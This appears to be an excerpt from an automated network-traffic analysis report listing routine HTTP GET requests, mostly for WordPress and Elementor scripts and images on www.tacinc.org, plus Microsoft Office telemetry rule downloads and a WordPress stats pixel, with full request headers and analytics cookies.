Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend-modules.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/2041663b2e746e59e63362466c21f79b.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/3f86132df1672ee9bc320961d8b32c63.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/wave-background-dark.jpg HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/12/ss_138257606_Brick_Apartment_with_Trees-scaled.jpg HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/6419b4d897e8dc5284378e8acb00aa04.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/frontend.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/footer-tall.jpg HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/2041663b2e746e59e63362466c21f79b.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/wave-background-dark.jpg HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/hummingbird-assets/3f86132df1672ee9bc320961d8b32c63.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/11/footer-tall.jpg HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /wp-content/themes/socialdriver/js/functions-spb.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/images/icon-close.svg HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/05/featImg_Homecoming-2@1200x675px-768x432.png HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/Conrad_Medicaid_Mental_Health_Youth_3x2-367x266.jpeg HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /g.gif?v=ext&blog=228569162&post=7&tz=-4&srv=www.tacinc.org&j=1%3A13.9.1&host=www.tacinc.org&ref=&fcp=7473&rand=0.7742469349941385 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/03/featImg_YAB-Series-Expanded-Edges@2400x1350px-367x266.png HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /g.gif?v=ext&blog=228569162&post=7&tz=-4&srv=www.tacinc.org&j=1%3A13.9.1&host=www.tacinc.org&ref=&fcp=7473&rand=0.7742469349941385 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/tac-child/images/icon-close.svg HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/03/featImg_YAB-Series-Expanded-Edges@2400x1350px-367x266.png HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/Conrad_Medicaid_Mental_Health_Youth_3x2-367x266.jpeg HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650; cookielawinfo-checkbox-necessary=yes; cookielawinfo-checkbox-non-necessary=yes
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
